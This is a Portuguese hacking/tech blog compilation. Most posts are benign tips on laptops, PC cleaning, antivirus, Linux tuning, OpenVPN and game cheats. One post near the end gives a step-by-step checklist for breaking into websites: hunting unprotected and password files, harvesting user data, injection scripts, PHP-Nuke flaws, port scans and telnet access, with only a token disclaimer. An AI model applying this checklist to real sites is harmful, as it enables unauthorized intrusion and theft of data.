|||||| Clique aqui!
Vote neste site!

Dicas para escolher e comprar um notebook

Diversas vezes amigos meus me pediram ajuda pra comprar um notebook, aí perguntam “Dell é bom?”, “Sony é bom”. Pô eu sei lá?? – fico pensando. São tantos fatores que determinam se um notebook é bom ou não que você pode ter um bom de uma marca desconhecida e um ruim da Sony. E olha que ainda tem o fato de que os fatores que determinam se um notebook é bom são bem diferentes de um desktop. 

Como eu analiso na hora de comprar um Notebook? O que passa pela minha mente perturbada? Vou lhes dizer o quê.

1) Quanto de memória tem a máquina? Quanto mais melhor, mas eu diria que hoje, 1GB é o mínimo que deveria ter.

2) Qual o processador? Fico espantado de ver no jornal um anúncio das casas Bahia vendendo notebooks com processador Celerom com altos preços. Se você quer um computador pra acessar a internet e trabalhar com o Office, talvez um processador fraco seja suficiente mas lembre-se que novas versões dos programas consomem mais processamento e sempre queremos elas. Exija um bom processador Centrino da Intel por exemplo, desenvolvidos para notebooks e que consomem pouca energia e tem bom desempenho. Veja a tabela de desempenho por preço:



Tabela de processadores (Loja Newegg)

Tabela de processadores Intel.

3) Funcionalidades. Portas USB, Firewire, Bluetooth, Webcam, rede sem fio (wireless) e rede normal. Cheque se o notebook tem estes ítens pois eles são quase que obrigatórios hoje em dia. Modem não é mais tão importante até porque se você tem um celular bluetooh ele pode servir do modem pro seu notebook.

4) Peso. Quanto menos pesar melhor mas o preço aumenta. Se você anda muito carregando o notebook isso será um fator de “peso” literalmente na hora da escolha.

5) Vida útil da bateria. Pergunte sobre a duração da bateria e cheque se existe no mercado a venda desta bateria pois um dia a bateria original vai morrer e você terá que comprar uma nova.

6) Tamanho da tela. Uma tela de 17 polegadas impressiona, mas também impressiona a bateria que dura muito pouco nestes notebooks. Eu gosto de 14 polegadas mas de 15 também é uma ótima escolha. Se não for fundamental pra você, compre de telas menores porque você poderá usar mais tempo o notebook quando estiver longe de uma tomada.

7) Disco rígido (HD). Espaço é aquele negócio “sempre queremos mais”. Um disco com menos de 80GB eu diria que é pequeno. Veja também a velocidade (RPM) do disco, 5400 RPM é uma boa velocidade pois é bem mais rápido dos que tem 4K e consome menos bateria dos de 7200RPM. Verifique também se dá pra trocar o HD facilmente pois é uma peça que normalmente estraga rápido em notebooks.

Placa de vídeo. Normalmente um notebook não terá uma boa placa de vídeo e se você precisa de alto desempenho em aplicações gráficas ou simplesmente pra jogar, terá que verificar qual a placa de vídeo que vem nele. Cheque a memória da placa de vídeo pois para ser uma boa placa deve ter no mínimo 128Mb de memória.

9) Drive leitor de CD e DVD. Acho que hoje todos os notebooks devem ler/gravar CDs e DVDs. Algo menos que isso seria um leitor de DVD com gravador de CD, talvez seja aceitável e pra mim não seria nada decisivo na hora de escolher entre um modelo e outro.

10) Tempo que você ficará com o notebook. Lembre-se também que um notebook custa caro e que você ficará com ele mais tempo que normalmente fica com os desktop que compra, então pense no futuro à longo prazo para não perder dinheiro no investimento que está fazendo. Uma boa marca custa mais mas talvez tenha melhor suporte e garantia.

Onde comprar seu notebook? Existem muitas grandes lojas vendendo, acho que eu escolheria comprar numa loja ao invés de comprar online pois qualquer problema poderia levar e trocar imediatamente ao invés de passar terror enfrentando o correio.

Hoje eu tenho um Macbook Black com 2GB de RAM e 250GB de HD. A única coisa que sinto falta nele é uma boa placa de vídeo. Ano que vem ele será trocado por um MacBook Pro de 15″ já com o OSX 10.5 Leopard e o que vier de novidades da Apple até lá.

Espero que tenham gostado das minhas dicas. Boa sorte e boas compras.

Como limpar o PC?

A realização da limpeza interna do PC é muito importante. Isso é uma questão já muito discutida, pois os usuários acreditam que é necessário pagar técnicos ou comprar equipamentos caros para realizar a limpeza.

Isso não é verdade, pois podemos realizar a limpeza com equipamentos caseiros e baratos.

1. O Monitor. Para limpar o monitor caso ele seja LCD, leia o tutorial Como limpar monitor LCD. Caso seja CRT, basta você passar um pano levemente umidecido.

2. O Gabinete. Para a limpeza do gabinete passe um pano umidecido e embebido em detergente “multi uso”.

3. Os componentes. Para a limpeza dos componentes, retire a poeira grossa com um pincel grosso ou uma escova de dentes. Caso esteja muito empoeirado, retire os componentes para aumentar a eficiência da limpeza.

4. Os contatos dos componentes (aqueles dourados, que vão conectados na placa mãe) devem ser limpos com uma borracha branca, daquelas escolares. Passe sobre eles para remover a sujeira e depois passe um pincel levemente para retirar os resíduos da borracha.

5. Os slots e conectores da placa mãe devem ser limpos utilizando uma escova embebida em alcool isopropilico. Não utilize o alcool comum. Se a placa mãe estiver muito suja, retire-a e de um banho nela com alcool isopropilico.

6. A limpeza do cooler deve ser feita com um pincel ou escova de dentes. Se estiver muito sujo, desmonte-os e realize a limpeza.

Tipos de hackers e suas características

O termo hacker surgiu em meados dos anos 60 e originou-se da palavra phreak (acrônimo de phone hacker), que eram os hackers que estudavam o sistema de telefonia e com isso conseguiam fazer ligações de graça. Naquela época os sistemas de informática (assim como os de telefonia) eram restritos a poucos: apenas tinham acesso a eles os envolvidos com computação nos grandes CPDs (Centros de Processamento de Dados) de universidades e empresas.

Movidos pela curiosidade de saber como tudo aquilo funcionava, alguns grupos de estudantes quebravam os cadeados dos CPDs usando um machado. Hack significa cortar, golpear em inglês, daí o termo ter sido adotado para designar aqueles que quebram a segurança para aprender sobre algo que pessoas comuns não têm acesso.

De posse da informação desejada, cada um resolveu fazer o que bem entendia com isso, e hoje podemos classifica-los como:
White Hats (hackers éticos): Seguem a mesma linha de pensamento original do hacking. Gostam apenas de saber e conhecer mais das coisas, principalmente as fechadas ao público. Para essas pessoas, aprender é a diversão mais importante do mundo. Elas gastam boa parte de seu tempo estudando o funcionamento do que as cerca, como telefonia, internet e protocolos de rede e programação de computadores.

No mundo da segurança de sofware, os hackers éticos são os responsáveis por “informar” as grandes empresas de vulnerabilidades existentes em seus produtos. Fora do mundo da segurança, essas pessoas são responsáveis por desenvolver software livre, como o sistema operacional GNU/Linux.


O hacker ético defende o conhecimento em prol de todos, portanto não o utiliza para prejudicar outras pessoas ou companhias, a menos que considere que uma empresa faz mau uso do poder. A quebra da segurança do iPhone, que bloqueia o seu funcionamento com outras operadoras de telefonia, foi um notável ato de um White Hat.

Black Hats (hackers mal-intencionados): Assim como os White Hats, os Black Hats também são movidos pela curiosidade. O que os distingue é o que cada um faz com a informação e o conhecimento.

O Black Hat vê poder na informação e no que ele sabe fazer. São aqueles hackers que descobrem uma vulnerabilidade em um produto comercial ou livre e não contam para ninguém até que eles próprios criem meios de obter dados sigilosos de outras pessoas e empresas explorando a vulnerabilidade recém-descoberta.

Essa espécie de hacker é responsável por gerar a terceira espécie, os script kiddies. Eles surgem quando cai na rede uma ferramenta ou técnica de invasão criado por um grupo de Black Hats.

Script Kiddies: São os responsáveis pelas invasões em massa e por fazer barulho na mídia quando invadem sites importantes e alteram sua página inicial colocando frases de protesto ou quando tiram serviços do ar.

Recebem esse nome por não saber o que estão fazendo. Eles simplesmente buscam ferramentas prontas, os chamados exploits, que exploram uma determinada vulnerabilidade, e então buscam servidores e serviços vulneráveis. Não sabem como o exploit funciona, já que ele que foi denvolvido por um Black Hat, que provavelmente estudou o assunto.

Grande parte dos Black Hats já atuou como Script Kid no início de sua jornada no mundo do hacking.

Crackers: São de outra natureza. Ao contrário dos hackers convencionais, que estudam protocolos de rede, telefonia e sistemas operacionais, e dos kiddies, que buscam obter fama por causar transtornos a websites e serviços, os crackers se distinguem de todo o resto por se focarem em como funcionam os programas de computador.

São os responsáveis pela criação dos cracks, ferramentas que quebram a ativação de um software comercial, permitindo que qualquer pessoa tenha uma versão pirata do software em seu computador.

Esses hackers são responsáveis pelo prejuízo das empresas de software, e também por desenvolver vírus e outras pragas como spywares e trojans. O termo cracker também é usado incorretamente para designar os Black Hats, o que é ofensivo tanto para o Black Hat como para o Cracker.
Ola estou aqui para informar que nosso blog foi plageado!

 Veja esse link http://www.hackingehacker.blogspot.com/ 

 Da ate pena de ver isso!

Top melhores Antivirus Gratis:

Nos dias de hoje não pode existir mais computador sem antivírus. Ainda mais Windows sem proteção. Para quem não quer pagar uma boa quantia por renomados programas de proteção, aqui segue uma lista com os 10 melhores antivírus grátis para Windows.


Avast Free antivirus
Versões de Windows suportadas: Vista/XP/2000/NT4/98/ME/95.
Última versão: 4.7.
Faça download de Avast aqui.

AVG Anti-Virus Free Edition
Versões de Windows suportadas: Vista/XP/2000/98/ME/95.
Última versão: 7.5.516a1225.
Faça download de AVG Anti-Virus aqui.

Avira AntiVir Personal Edition
Versões de Windows suportadas: Vista/XP/2000.
Última versão: 7.06.00.270.
Faça download de Avira AntiVir aqui.

Clamwin
Versões de Windows suportadas: Vista/XP/2003/2000.
Última versão: 0.92.
Faça download de Clamwin aqui.

PC Tools AntiVirus Free Edition
Versões de Windows suportadas: Vista/XP/2000.
Última versão: 4.0
Faça download de PC Tools aqui.

Dr.Web CureIt
Versões de Windows suportadas: Vista/XP/2003/2000/NT4/98.
Última versão: 4.44.
Faça download de Dr.Web Cureit aqui.

BitDefender Free Edition
Versões de Windows suportadas: Vista/XP/2000/NT4/98/ME.
Última versão: 10.
Faça download de BitDefender aqui.

MicroWorld Free AntiVirus Toolkit Utility
Versões de Windows suportadas: Vista/XP/2000.
Última versão: 9.0.
Faça download de MicroWorld aqui.

Antidote Super Lite version
Versões de Windows suportadas: XP/2000/98/95.
Última versão: ¿?
Faça download de Antidote aqui.

Comodo Anti-Virus
Versões de Windows suportadas: XP/2000.
Última versão: 2.0 beta

Faça download de Comodo Anti-Virus aqui.

 Historia do Windows

 Bem atendendo ao pedido de alguns leitores do blog vou começar a postar mais videos, bem mas esse ai mostra todo a historia do Windows, so nao aparece o Windows Vienna (7) mas deem uma olhada:

O melhor sistema operacional

 Na nossa vida tanto virtual como real, nos deparamos varias vezes com está pergunta, e depois de eu ter ouvido várias barbaridades e de brigas a respeito do mesmo resolvi escrever este artigo para dizer qual o melhor sistema operacional.
Não sou nenhum fã da microsoft, e apoio open-source (tanto que este blog é movido a wordpress, que roda em PHP, que tem como banco de dados mysql, que tem como servidor web o apache e que roda em Linux – Todos open-source).

É comum hoje, tanto na blogosfera como na vida real encontrarmos pessoas que criticam incansavelmente a microsoft e seus produtos, principalmente seu sistema operacional. Ainda por cima vangloriam o Linux.

Tá bom, mas o que há de errado nisto?

O erro está é que muita gente diz que o “Linux é o melhor sistema operacional”, que “windows só trava e pega vírus”. Tá bom, nada de errado nisto, porém há uma controvérsia.

Cerca de 60% das pessoas que me dizem isto, nunca viram Linux rodando. Como você afirma que algo que você nunca viu e usou é melhor do que algo que você usa todos os dias?

Tem gente que até se espanta quando dizemos que o Linux é open-source (e que no geral também não sabem o que é open-source) e gratuito (nem todas as distribuições). Dizem afirmar isto porque viram um amigo ou site na internet dizendo isto. Não o utilizam porque Linux é difícil, não roda seus jogos e programas, e etc.

Então pense comigo, se o Linux pra você é muito difícil, não roda os jogos e programas que você gosta, e mesmo o Windows sendo ruim e só travar e pegar vírus, você o utiliza porque ele faz o que o Linux não faz. Então a resposta é simples, o Linux NÃO é o melhor sistema operacional pra você, e sim o Windows (ou qualquer outro, como Mac)

Agora por exemplo, para o dono da empresa em que eu hospedo este blog, que depende de todos os softwares citados acima que são open-source (e que rodam em Linux – apesar de rodarem também em Windows) para por meu blog no ar, para ele Linux é o melhor sistema operacional.

Você não deve usar um sistema operacional (ou um software qualquer) porque dizem que ele é melhor, você deve utilizar o que supre todas as suas necessidades. Se o seu sistema operacional faz tudo o que você precisa, logo, ele é o melhor pra você.

Vale uma ressalva é que não estamos analisando dados técnicos entre os sistemas operacionais e a facilidade de aprendizado, mas sim se ele supre as necessidades que você tem.

Então vamos parar com está mania de falar pra todo mundo que o sistema operacional “X” é melhor do que o “Y”, e sim analizar para que fins a pessoas quer o sistema, e ai sim indicar, o sistema operacional “X” roda todos os jogos que você gosta. O SO “Y” é mais estável para sua empresa e etc.

Espero que tenham gostado.
Abraços!

Curso rápido de HTML grátis

Colocámos hoje aqui no nosso blog, um mini tutorial em 9 páginas, sobre os fundamentos do HTML, para aqueles que não percebem nada do assunto e gostariam de dar os primeiros passos.

Para aceder ao livro grátis, clique aqui.



Top30 Brasil - Vote neste site!

Concurso de sites Top30 Brasil vote em Hacking e Explorer.

E ae, bem agora como vocês podem ver, coloquei nosso blog no concurso top 30 Brasil, queria pedir para vocês votaram em nosso blog na categoria hacker, bem para votar basta clicar no banner acima e confirmar o voto na janela que vai abrir.
Bem tive que colocar alguns banners para que vocês votem, por que ainda quero que este blog ganhe o top 30 Brasil e quem sabe um dia o prémio ibest.

Obrigado a quem votar!

Linux - Como melhorar o desempenho em rede

O kernel do Linux possui uma série de variaveis que podem ser modificadas para melhorar a performance do sistema. Quando falamos de melhorar de performance e mexer em váriaveis de sistemas, no caso iremos e mexer no proc filesystem, devemos tomar cuidado, sendo que a melhor forma é sempre analisar, avaliar asalterações que fazemos, o que pode melhorar o meu servidor, pode nao melhorar o seu.

Quando o servidor esta conversando com alguma aplicação, fazendo um NAT, trabalhando como um firewall ele esta armazenando todas estas informações em RAM, por isso a limitação, ele tem que compartilhar esta RAM com outros dispositivos do sistema, por isso as vezes surge um certo congestionamento, e por isso ele tem que atribuir limite para os trabalhos de rede.

Aqui vai umas dicas de como melhorar o desempenho de um sistema Linux, para trabalho em rede, principalmente como Firewall.

Todas as váriaveis abaixo estão localizada em "/proc/sys", para modifica-las, vamos fazer através do comando sysctl, ao invés de ficar distribuindo echo pelo sistema.

net.core.rmem_maxnet.core.wmem_maxEsta váriavel diz ao sistema o tamanho máximo de leitura e escrita para sockets, podemos tentar dobrar estas váriaveis por exemplo, por padrão o seu sistema estará com 128Kb (Calculo feito pelo proprio sistema no boot, baseado em sua memória RAM):

sysctl -w net.core.rmem_max=256000 >> /etc/sysctl.confsysctl -w net.core.wmem_max=256000 >> /etc/sysctl.conf

Obs. Esta váriavel esta disponível também caso voce deseja aumentar apenas o buffer da pilha TCP/IP. Basta alterar o caminho para:

net.ipv4.wmem_max
net.ipv4.rmem_max

net.core.netdev_max_backlog

Este parametro diz ao sistema o número maximo de pacotes que podem ser enfileirados para entregar ao device de rede. Caso a sua rede seja de alto desempenho:

sysctl -w net.core.netdev_max_backlog=2000 >> /etc/sysctl.conf

net.core.somaxconn

Esta váriavel seta o máximo permitido de conexõs no backlog através da função listen() do sistema. Quando o número conexões alcança este valor, conexões futuras são descartadas.

sysctl -w net.core.somaxconn=256 >> /etc/sysctl.conf

net.ipv4.tcp_max_syn_backlog

Esta váriavel controla a fila de TCP Syn para cada porta. Conexões novas são armazenadas até ela ser aceita pelo servidor. Se existir mais conexões do que o valor especificado por esta váriavel a conexão será rejeitada.

sysctl -w net.ipv4.tcp_max_syn_backlog=2048

Estas são algumas, das muitas váriaveis que podem melhor o desempenho de seu servidor, lembre-se este valores podem ser aumentados, dimunuindos, para ajustes conforme a sua necessidade, é só testar.
 "Um novo e brilhante software para edição de imagens - simples, rápido e engenhoso!"

MAGIX Photo Clinic é um programa de processamento de imagens baseado em uma combinação de técnicas de manipulação de objetos e camadas.

A imagem principal e todos os objetos têm suas próprias camadas de edição, as quais recaem sobre o plano de fundo como uma folha sobre a qual os efeitos de processamento podem ser aplicados, apagados ou corrigidos sem limitações!

O plano de fundo permanece inalterado pela camada de edição até que o usuário se satisfaça com os resultados e conecte a camada com a imagem. A camada independente torna possível escolher entre os parâmetros de um efeito mesmo depois da aplicação deste.

Além do mais, objetos (ou áreas de imagem independentes) podem ser gerados a partir da imagem e reintegrados de acordo com a sua vontade. Transparência e um modo podem ser associados aos objetos para obter combinações em uma imagem. Os objetos também podem ser redimensionados.

Todos os efeitos e filtros podem ser aplicados para a camada de edição inteira, apenas na imagem principal ou individualmente com o pincel.

Destaques

Ajuste de objetos fácil e funções otimizadas de clonagem
Objetos podem ser copiados através de um simples clique com o botão direito ou através de um atalho de teclado. A função de clonagem duplica pessoas e objetos nas imagens. Surpreenda seus parentes e amigos colocando "irmãos gêmeos" das pessoas nas fotos!

Ferramenta prática de preenchimento
Substitua cores com uma ferramenta facilitada. Os tons da superfície são reconhecidos automaticamente e trocados pela cor de sua escolha.


Design inteligente e interface intuitiva
Experimente os controles e design amigável deste editor e impressione-se com as funções auto-explicativas. Tarefas como editar e gerenciar fotografias tornam-se uma verdadeira alegria!


Um clique para melhorar suas imagens
Obtenha uma descrição detalhada com apenas um clique para acessar as funções de otimização, edição e adição de efeitos rapidamente.

Estreite seus horizontes
Você tirou uma foto ótima, mas um pouco embaçada e fora de foco ao longe? Sem problemas! Basta desenhar uma linha usando o mouse através do horizonte desfocado para esticá-lo automaticamente.

Recursos

A versatilidade do MAGIX Photo Clinic ainda propicia recursos de edição profissional com imagens panorâmicas, montagens, layouts, pinturas à mão e outras. Você também pode aplicar efeitos de distorção artística como pintura a óleo, caricaturas, mosaico e desenhos à mão livre; retoques para remover olhos vermelhos, borrões e imperfeições com um clique.

Você só ganha utilizando este software, otimizando suas fotografias com controles de auto-contraste, auto-colorir, brilho, saturação, correção de gama e nitidez. O editor de texto complementa o pacote oferecendo sombras e efeitos em 3 dimensões.

E quando você terminar, para imprimir suas imagens, selecione opções para imprimir várias fotos numa página só, coloque séries de imagens na sua área de trabalho e muito mais!

MAGIX Photo Clinic é um novo e brilhante software para edição de imagens - simples, rápido e engenhoso! Aperfeiçoe suas imagens e desfrute das poderosas funções de fácil manuseio que nem sequer requerem experiência prévia.


  Nenhum virus detectado!
Como melhorar o desempenho do Windows Vista

 O Microsoft TechED 2008 se encerrou na última quinta-feira (16/10). Uma das últimas palestras que acompanhei, foi apresentada por Artur Higashiyama – MVP Directory Services. Ele tocou em um ponto sensível do novo sistema operacional da Microsoft – performance. Segundo ele, o sistema foi desenvolvido pensando em máquinas que ainda seriam lançadas.



Sobretudo, o Vista foi lançado como um sistema operacional, que viria a impressionar todos os seus usuários não só pela parte técnica do produto, mas principalmente por seu visual. Ou o grande “Wow”, como dizia a Microsoft.

A maior ironia nesta parte, foi que logo no começo da apresentação, surgiu uma comparação entre o sistema da Apple e o Vista;

“Atualmente tanto PCs quanto Macs, utilizam plataformas praticamente idênticas. Desde a introdução dos processadores Intel nos computadores da Apple, podemos dizer que o Hardware de ambas as plataformas agora se equivalem.”

Falar isso para um Mac OS Xiita, é pedir para levar esporro. Se havia alguns deles infiltrados ali no evento da Microsoft, eu não sei, mas a apresentação continuaria não sendo para eles. Isso porque logo depois de fazer esta comparação -justa- de hardware, Higashiyama falou sobre as primeiras coisas que você pode fazer para melhorar o desempenho do Vista: desativar o Wallpaper, a interface Aero e a Sidebar.

Ok. Let’s go back to Windows 98.

Dando continuação, Higashiyama falou de alguns softwares de concorrentes, que quando instalados, adicionam uma regra para iniciarem junto com o sistema. O resultado é um Windows cheio de processos inúteis rodando em background, que consomem recursos da máquina.

O próprio Windows possui uma porção de processos ativados por padrão, que nunca chegam a ser usados pela maior parte dos usuários. Se você for um hard-user, pode desativar estes processos, e aliviar mais alguns sagrados megabytes de carga na memória. O Thas mostra como fazer isso lá no WinAjuda.

De todas as dicas dadas por Higashiyama, as que mais influenciam na performance do sistema, são alterações que poderiam vir como padrão de fabricação. Alterações essas, que a maioria dos hard-users provavelmente já conhecia, mas que usuários básicos nunca farão no sistema.

No final, as minhas maiores dúvidas, giraram em torno de apenas uma lógica: ao invés de educar o usuário final, ensinando um a um a otimizar o sistema, porque não alteram a forma como o Windows lida com as aplicações, e resolvem tudo de uma vez?

OpenVPN avançado: Certificados e bridges 

Uma VPN (Virtual Private Network, ou rede virtual privada) é, como o nome sugere, uma rede virtual, criada para interligar duas redes distantes, através da Internet. Usar uma VPN permite que você compartilhe arquivos e use aplicativos de produtividade e de gerenciamento, como se todos os micros estivessem conectados à mesma rede local. Você pode até mesmo imprimir em impressoras da rede remota, da mesma forma que faria com uma impressora local.

Antigamente, a única forma de interligar redes em dois locais diferentes era usar linhas de frame-relay. Para quem não é dessa época, uma linha de frame-relay oferece um link dedicado de 64 kbits entre dois pontos (a matriz e a filial de uma empresa, por exemplo), com um custo mensal fixo. Você pode combinar várias linhas frame-relay em uma única conexão, de acordo com a necessidade, o problema nesse caso é o preço. Atualmente, existem outras opções de conexões dedicadas e de conexões de alta disponibilidade, oferecidas pelas operadoras, mas elas ficam fora do orçamento da maioria das pequenas e médias empresas.

Usando uma VPN, você pode obter todos os benefícios de ter uma conexão dedicada entre dois pontos usando conexões via ADSL ou cabo, que são muito mais baratas. Dependendo do volume de uso da rede, você pode tanto utilizar a conexão que já tem quanto utilizar uma segunda conexão apenas para a VPN, evitando assim que o tráfego prejudique a navegação dos usuários. Além de interligar duas ou mais redes, a VPN pode (dependendo da configuração) ser acessada também por funcionários trabalhando remotamente.

Todos dados que trafegam através da VPN são encriptados, o que elimina o risco inerente à transmissão via Internet. Naturalmente, nenhuma VPN pode ser considerada "100% segura", já que sempre existe um pequeno risco de alguém conseguir obter acesso aos servidores, de forma a roubar as chaves de encriptação (por exemplo), mas, em uma VPN bem configurada, o risco é realmente muito pequeno. É muito mais provável que um funcionário descontente sabote a rede interna, ou envie informações sigilosas para fora, do que algum invasor consiga efetivamente obter acesso à rede via Internet.

Nesse tópico, estudaremos como criar VPNs usando o OpenVPN. Além de ser mais simples de configurar que a maioria das outras soluções de VPN e ser bastante seguro e flexível, ele possui versões Linux e Windows, o que permite criar túneis interligando máquinas rodando os dois sistemas sem grandes dificuldades.

Outras vantagens são que ele pode ser usado por clientes conectando através de uma conexão compartilhada via NAT (apenas o servidor precisa de portas abertas) e a boa tolerância contra conexões ruins, ou ao uso de conexões com IP dinâmico. A VPN pode ser configurada para ser restabelecida de forma automática em caso de interrupção na conexão, o que torna o link bastante confiável.

Com relação à segurança, o OpenVPN pode ser configurado para utilizar chaves estáticas, que oferecem um nível mediano de segurança, em troca de uma configuração mais simples, ou para utilizar certificados X509, onde a configuração é um pouco mais complexa, mas, em compensação, a segurança é muito maior (bem superior à da maioria das soluções comerciais). Isso permite que você escolha a melhor relação entre praticidade e segurança de acordo com a situação.

Usar chaves estáticas permite criar VPNs rapidamente, interligando duas máquinas. A facilidade de configuração faz com que esta modalidade seja a mais utilizada, embora as limitações sejam claras.

Vamos agora criar uma configuração mais elaborada, utilizando certificados X509. Este método é chamado de PKI (Public Key Infraestructure) e permite criar VPNs mais complexas, envolvendo vários servidores e vários clientes, além de oferecer uma maior segurança.

Para isso, criaremos uma "entidade certificadora", que será usada para gerar os certificados usados pelo servidor e pelos clientes. Falar em uma "entidade certificadora" dá a impressão de que precisaremos contratar uma empresa especializada para gerar os certificados, mas, na verdade, tudo é feito internamente, usando scripts fornecidos junto com o OpenVPN.

Durante o processo, é gerado um certificado mestre (um arquivo, que pode ser tanto armazenado pelo próprio servidor quanto por outra máquina da rede) que é usado para gerar os certificados usados pelas máquinas. O uso dos certificados permite que o servidor verifique a identidade dos clientes e também que os clientes verifiquem a identidade do servidor, evitando a possibilidade do uso de ataques "man-in-the-middle", onde alguém substitui o servidor por outra máquina, configurada para capturar as credenciais dos clientes quando eles tentam estabelecer a conexão.

Os certificados podem ser criados rapidamente, conforme for necessário conectar mais máquinas à VPN. Quando é necessário bloquear o acesso a uma determinada máquina (um funcionário que se desligou da empresa, por exemplo), basta revogar o certificado para que o servidor deixe de aceitar a conexão.

Counter Strike - Truques e Dicas

Bem a pedido de alguns amigos meus decidi postar sobre cs! Então ta ai mais tarde posto mais!

Truques, dicas e códigos para o jogo Counter Strike para PC.

Para activar os códigos aperte o botão ” e digite “sv_cheats 1″ (sem aspas) e digite os códigos desejados…

Sniper rifle do ártico - givespaceweapon_awp
Mira automática com o sniper rifle - sv_aim
Ajustar a gravidade - sv_gravity
Ver e disparar através de paredes e objetos, padrão 3600 - gl_zmax

Ver os frags dos outros jogadores - cl_hidefrags 0
Mover-se para a frente mais rapidamente - cl_forwardspeed 999
Mover-se para trás mais rapidamente - cl_backspeed 999
Mover-se para o lado mais rapidamente - cl_sidespeed 999
Selecção de fases - changelevel
Selecção de armas - give
Recarregamento automático activado - +reload
Recarregamento automático desactivado - -reload
Ver as coisas mais claras sem luz - lambert -1.0001
SetC4 timer - mp_c4timer
Hiper mira automática activada - sv_clienttrace 9999
Hiper mira automática desactivada - sv_clienttrace 0000
Ganhar $16.000 - impulse101

Para conseguir itens:

give [xxx] (substitua “xxx” por um dos códigos seguintes)
item_airtank, item_antidote, item_battery, item_healthkit, item_longjump, item_security, item_sodacan, item_suit, ammo_357, ammo_9mmAR, ammo_9mmbox, ammo_9mmclip, ammo_ARgrenades, ammo_buckshot, ammo_crossbow, ammo_egonclip, ammo_gaussclip, ammo_glockclip, ammo_mp5clip, ammo_mp5grenades, ammo_rpgclip, weapon_357, weapon_9mmAR, weapon_9mmhandgun, weapon_crossbow, weapon_crowbar, weapon_egon, weapon_gauss, weapon_glock, weapon_handgrenade, weapon_hornetgun, weapon_mp5, weapon_python, weapon_quantumdestabilizer, weapon_rpg, weapon_satchel, weapon_shotgun, weapon_snark, weapon_tripmine

Se souberes de mais dicas, truques, codigos ou cheats para Counter Strike, indique-nos comentando esta página.

Windows: Como ocultar pastas partilhadas

De certeza que já sentiu a necessidade de partilhar uns fimezitos, música e umas fotos pela rede. A dica que vos trago hoje é ocultar as pastas partilhadas de forma a que ninguém as possa ver na rede.

magine que trabalha numa empresa e quer partilhar umas fotos com um colega seu. Ao partilhar uma pasta na rede, esta será visível por todos os que estejam ligados naquela rede, o que pode não dar muito jeito.

O processo para ocultar uma pasta partilhada é muito, muito simples.

Primeiro vá até a pasta que pretende partilhar, botão do lado direito do rato e Sharing and Security (Partilha e Segurança).

Em seguida devem escolher o nome de partilha da pasta e acrescentar o símbolo $.

Agora um exemplo real: imaginem que vocês têm 2 computadores ligados à rede. O computador A tem o IP 192.168.0.1 e o B 192.168.0.2. Se o computador A tem a pasta partilhada pplware e o utilizador do computador B pretende aceder à pasta, terá de ir a start—> run (iniciar >executar) e escrever \\192.168.0.1\pplware$

Caso tenham algum problema no acesso verifiquem se existe alguma firewall instalada no vosso PC a barrar o acesso.

Como "Exploitar" um web site com o Web EXPLOITER:

1) Procure por todos os arquivos desprotegidos

2) Procure por todos os diretórios desprotegidos

3) Procure por todas as paginas

4) Se existir muitos arquivos organize-os com:

Arquivos desprotegidos (separe por extensões)

Arquivos em diretórios desprotegidos

5) Se o site contiver muitos diretórios desprotegidos procure por diretórios específicos

6) Procure por arquivos e diretórios relativos á senhas

7) Verifique os arquivos que você conseguiu, neles podem conter

-informações de usuários (essencial para fazer um usuário fake)

-dados do servidor

-dados do administrador

-arquivos de mídia e mais arquivos de seu interesse.

8) Tente entrar logado no ftp com login anônimo

9) Procure por pastas de FTP com o padrão “index of”

10) Use scripts de INJECTION

11) Procure por falhas de PHP-NUKE

12) Pegue o IP do site

13) Pegue o IP do FTP e do servidor de email (se o site tiver)

14) Faça um Port scan de todos os IPs que você conseguir

15) Conecte via telnet nos Ips que estão com as portas abertas

O web exploiter não tem suporte de telnet (Faça isto em seu PC)

Para conectar via telnet siga as instruções:

-separes os Ips que você consegui

-anote as portas abertas de cada IP

-abra seu prompt de comando e digite telnet (enter)

-digite o IP porta

exemplo para conectar no IP xxx.xxx.xxx.xx pela porta 21

o xxx.xxx.xxx.xx 21

16) Faça um traceroute para você visualizar a rede de servidores (se você invadir um servidor que esteja um nível abaixo do seu servidor alvo ,talves você poderá redirecionar este para onde você quiser)

17) O web exploiter foi feito para verificar a segurança de seu website, qualquer atitude ILEGAL, ANTI_ÉTICA, AMORAL é de sua responsabilidade.

"Monitore, limpe e optimize o uso de memória no seu computador! Diga adeus à lentidão!"

Não são poucos os casos de lentidão de computadores causados por má utilização da memória do equipamento. Isso acontece porque muita gente ainda não tem total domínio de técnicas e até mesmo das noções básicas para manter a memória do computador livre. Existem programas que exigem muito dela e, por consequência, deixam a sua máquina mais lenta. Mas, você pode resolver boa parte destes problemas, fazendo um monitoramento constante do uso destes recursos.


O Memory Improve Master é um software de monitoramento e administração do uso de memória no seu computador que pode ajudar muito a resolver problemas enfrentados com o uso da memória. Portanto, para começar a usá-lo e ter controle sobre o andamento das funções na sua máquina, clique no botão acima para começar a fazer o download do Memory Improve Master. Quando terminar, instale-o normalmente, seguindo as orientações do assistente de instalação.

Logo que este processo acabar, o programa será executado. Você verá uma janela azul com uma série de botões ou abas que contém as informações sobre o seu sistema. Clique no primeiro deles, “Information Overview” (Resumo de Informações) para ter acesso ao gráfico com as oscilações de uso de memória. Este gráfico é composto por três linhas, uma verde, uma amarela e outra azul. “Memory Usage” (Utilização de memória), “Paging File Usage” (Utilização de arquivos de paginação) e “CPU Usage” (Consumo da CPU), respectivamente.

Além do gráfico, você observa barras que exibem a porcentagem do consumo/uso de memória no seu computador. Estas informações são importantes para que você descubra se existe alguma sobrecarga ou risco de que isto aconteça na sua máquina. Quanto mais programas você deixar abertos, mais memória será utilizada e mais lento fica o seu computador.

Contudo, existem programas que

não estão sendo usados e consomem memória da mesma maneira que outros. Para resolver esta questão, você pode clicar no botão “Free” (Liberar) que irá verificar quais programas estão consumindo memória ociosamente e irá limpá-la. Feito isso, basta aguardar os resultados que devem ser imediatos (caso a carga de programas abertos não seja muito exagerada). Existe, ainda, uma segunda opção para liberar mais espaço na sua memória, o botão “Compress” (Comprimir).

Otimize a memória do seu computador!


Este botão só deve ser ativado quando o consumo de memória for tanto, que seja necessário comprimir o uso de alguns programas para liberar espaço de memória. Na segunda aba, “Memory Optimization” (Otimização de Memória), você encontra opções para otimizar o seu uso de memória no computador. A palavra “otimizar”, neste contexto, significa proporcionar melhores condições de uso de um determinado recurso. Como estamos falando de memória, o Memory Improve Master possui controles próprios para isso.

